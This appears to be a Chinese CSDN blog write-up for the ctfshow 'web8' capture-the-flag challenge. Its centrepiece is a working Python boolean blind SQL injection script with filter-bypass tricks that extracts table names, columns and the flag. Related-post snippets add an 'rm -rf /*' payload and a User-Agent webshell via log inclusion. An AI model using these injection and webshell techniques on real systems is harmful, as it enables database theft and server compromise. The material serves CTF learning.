ctfshow web8 wp

最新推荐文章于 2024-05-11 02:23:59 发布
最新推荐文章于 2024-05-11 02:23:59 发布
阅读量1.7k 收藏 1
点赞数 1
分类专栏: 瞎JB写又舍不得删的博客
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Critical_plus/article/details/108120414
版权

第八题看起来和第七题十分相似,但是尝试过后会发现第八题的有了一些关键词过滤,所以union拼接注入不可行,但是我们又看到了他会返回报错信息所以此时想到报错注入。
这里是我在网上抄的代码,原理就是一个一个字符去猜,直到猜出所有字符

import requests
s=requests.session()
url='http://124.156.121.112:28045/index.php'
table=""

for i in range(1,45):
    print(i)
    for j in range(31,128):
        #爆表名  flag
        #payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #爆字段名 flag
        #payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
        #读取flag
        payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))

        ra = s.get(url=url + '?id=0/**/or/**/' + payload).text

        if 'I asked nothing' in ra:
            table += chr(j)
            print(table)
            break
Critical_plus
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
ctfshow-WEB-web8
热门推荐
wangyuxiang946的博客
09-05 2万+
ctf.show WEB模块第8关是一个SQL 注入漏洞, 注入点是数值型, 注入类型推荐使用布尔盲注,此关卡过滤了空格,逗号,and,union等关键字, 1. 过滤空格, 可以使用括号() 或者注释/**/ 绕过 2. 过滤and, 可以使用or替代 3. 过滤union, 可以用盲注替代联合注入 4. 过滤逗号, 可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用substr(database() from 1 for 1)来代替 首先确定注入点, 输入...
CTFshow web1~8 WP Write by SunnyDog
qq_53099119的博客
10-12 1748
2、得到回显后,直接使用union联合注入,找到页面回显点,由于此处不知都为啥我的Hackbar使用出现问题,使用burp来发送数据包,在burp内将数据包发送到Repeater模块,然后传入攻击语句,即可在Response中的渲染内,看到出现回显点。本题与web3的第二种方法做法相同,在user-agent头后写一句话木马,包含日志文件后即可通过蚁剑连接。本题开启后,随意点击一个文章,可以发现url地址中有一个参数id,猜测有SQL注入点。蚁剑链接后,就可以在ctf_go_go_go中得到flag。
2024年最全ctfshow-萌新-web8( 从删库到跑路)_ctf,面试必问
最新发布
2401_84281729的博客
05-11 409
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
ctfshow-web8
aarong的博客
12-24 1726
如图跟上题一样都是sql注入类型的题目: 根据上题过滤空格的经验,这一题也是一样过滤了空格,并且and、和union select都过滤了,那么只能考虑运用其他方法来注入了: 过滤空格:可以使用/**/和%a0绕过 过滤联合查询语句:可以使用盲注替代联合注入 过滤逗号,:可以使用特殊语法绕过, 比如:substr(database(),1,1) 可以用 substr(database() from 1 for 1)来代替 过滤and:可以使用or 从这篇博客得到了注入代码: ...
ctfshow-萌新-web8( 从删库到跑路)
wangyuxiang946的博客
09-10 1万+
ctf.show萌新模块 web8关,这一关考察的是一个梗??? 进去页面以后展示了部分源码,提交一个参数flag,与文件中的key相同即可夺旗 这一关的线索就在进入关卡的弹窗中,阿呆熟悉的一顿操作,去了埃塞尔比亚 是非洲的一个国家,这是删库跑路的节奏啊,payload如下 ?flag=rm -rf /* rm指令 rm -rf /* 是Linux的一条指令,/*代表根目录下所有路径,作用是删除根目录下所有文件,也就是删除系统中的所有文件 格式:rm ...
刷题之旅第28站,CTFshow web8
cc菜的一批
02-17 2627
感谢ctf show平台提供题目 打开网站,入眼看起来像sql注入。 index.php?id=0/**/or/**/1=1# 网站过滤了union 常规注入是不行了,那么进行布尔型盲注。 题目对逗号进行了过滤,那么也有绕过姿势! ' and ascii(substr((select database()),1,1))=xx # 这样的话写个脚本很容易跑出来了,过滤逗号之后可以变成这样 '...
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目的WP,其中也有别人的WP
WP2-ctfshow
02-24
2
WP1-ctfshow
02-24
1
WP8模拟时钟
03-27
WP8模拟时钟:构建属于你的数字时间伙伴》 在科技日新月异的今天,手机已经成为了我们生活中不可或缺的一部分。尤其是智能手机,其丰富的功能让我们的生活更加便捷。Windows Phone 8(简称WP8)作为一款曾经备受...
CTFShow-Web篇详细wp(持续更新中ing)
Aluxian_的博客
04-23 1043
【代码】CTFShow-Web篇详细wp
ctfshow web8
qq_45694932的博客
09-13 802
整形注入 判断是字符型还是整形注入 1.检查是否存在注入 2.空格过滤用/**/替换 3. ,过滤: 将limit 0,1样式改为limit 1 offset 0。 将substr(string,1,1)改为substr(string from 1 for 1)。 id=-1 /**/or /**/1=1 返回正确 id=-1/**/or/**/1=2 错误没有回显应该是盲注 说明是整形注入 这里过滤了and import requests url='http://e2312a42-19a7-4415-
CTFShow Web7&Web8
qq_62566956的博客
03-29 349
版本控制很重要,但不要部署到生产环境更重要。
ctf.show web 8 sql注入过滤了‘
m0_46412682的博客
07-14 925
ctf.show web 8 sql注入过滤了’ 开始的页面 提示是sql注入,第一步先试下 ’ or 1=1# 提示sql注入错误 第二步试下/**/替代空格,还是错误 第三步,去掉’单引号,成功,说明过滤了单引号 查看有多少字段,1/**/or/**/1=1/**/union/**/select/**/1,2,3#,但是这里又提示sql错误,这里可能过滤了select和union关键字 上脚本,这的脚本是网上找的 import requests s=requests.session() url='h
CTFshow_萌新计划——web1~web8
Ho1aAs‘s Blog
10-31 1797
文章目录一、web1~4二、web5~8完 一、web1~4 ·web1 代码审计,要求发送GET请求使id参数为1000即可得到flag,然而需要绕过if下的intval()函数,大于999直接报错。由于PHP是弱语言,此处有两种思路: 逻辑或:?id=999 or id=1000,?id=999 || id=1000此处intval函数得到的值是999,绕过了判断语句,从而执行sql语句,得到flag 加号:?id=999+1利用了弱语言的特性绕过intval,传入sql执行相加得到1000 ·we
ctf.show web入门(信息搜集) 1~20
qq_61768489的博客
01-15 1212
目录 web1 web2 web3 web4 web5 web6 web7 web8 web9 web10 web11 web12 web13 web14 web15 web16 web17 web18 web19 web20 web1 右击查看源代码即可 web2 他告诉说无法查看源代码,确实右击 F12没反应, 但是我们直接Ctrl+u 就可以看了 或者 hint给了一个方式 :通过在url头部添加 view-sourc...
CTF-安全杂项(八)
→_→
08-31 1443
声明:以下CTF题均来自网上收集,在这里主要是给新手们涨涨见识,仅供参考而已。需要题目数据包的请私信或在下方留言。 15.Snake(来源:实验吧) 1.关卡描述 2.解题步骤 分析: 点击解题链接发现是一张蛇的图片,将其下载下来 发现是jpg格式的图片,如果是一张正常的jpg图片,那么它的结尾应该是FF D9...
ctfshow-web80
m0_73303597的博客
01-04 618
自用
ctfshow web 电子取证
08-21
根据提供的引用内容,我了解到在ctfshow web电子取证中,分别得到了三个flag。的flag是ctfshow{e6ad8304cdb562971999b476d8922219},的flag是ctfshow{af5b5e411813eafd8dc2311df30b394e},的flag是ctfshow{5526710eb3ed7b4742232d6d6f9ee3a9}。这些flag可能是通过对Web上的电子证据进行分析和取证获得的。具体的取证过程和相关技术可能需要更多的背景信息才能进行详细的讨论。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [ctfshow终极考核wp](https://blog.csdn.net/weixin_46270220/article/details/122543062)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值